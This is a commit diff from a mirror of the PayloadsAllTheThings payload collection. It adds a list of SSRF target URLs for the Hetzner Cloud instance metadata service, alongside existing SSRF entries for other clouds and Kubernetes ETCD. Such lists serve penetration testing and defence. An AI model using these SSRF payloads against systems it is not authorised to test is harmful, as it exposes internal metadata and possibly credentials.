mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
Adding Hetzner Cloud Metadata URL
https://docs.hetzner.cloud/#server-metadata
This commit is contained in:
parent
80dda8beeb
commit
3c9fdec3da
1 changed files with 12 additions and 0 deletions
|
@ -805,6 +805,18 @@ http://100.100.100.200/latest/meta-data/instance-id
|
||||||
http://100.100.100.200/latest/meta-data/image-id
|
http://100.100.100.200/latest/meta-data/image-id
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### SSRF URL for Hetzner Cloud
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://169.254.169.254/hetzner/v1/metadata
|
||||||
|
http://169.254.169.254/hetzner/v1/metadata/hostname
|
||||||
|
http://169.254.169.254/hetzner/v1/metadata/instance-id
|
||||||
|
http://169.254.169.254/hetzner/v1/metadata/public-ipv4
|
||||||
|
http://169.254.169.254/hetzner/v1/metadata/private-networks
|
||||||
|
http://169.254.169.254/hetzner/v1/metadata/availability-zone
|
||||||
|
http://169.254.169.254/hetzner/v1/metadata/region
|
||||||
|
```
|
||||||
|
|
||||||
### SSRF URL for Kubernetes ETCD
|
### SSRF URL for Kubernetes ETCD
|
||||||
|
|
||||||
Can contain API keys and internal ip and ports
|
Can contain API keys and internal ip and ports
|
||||||
|
|
Loading…
Reference in a new issue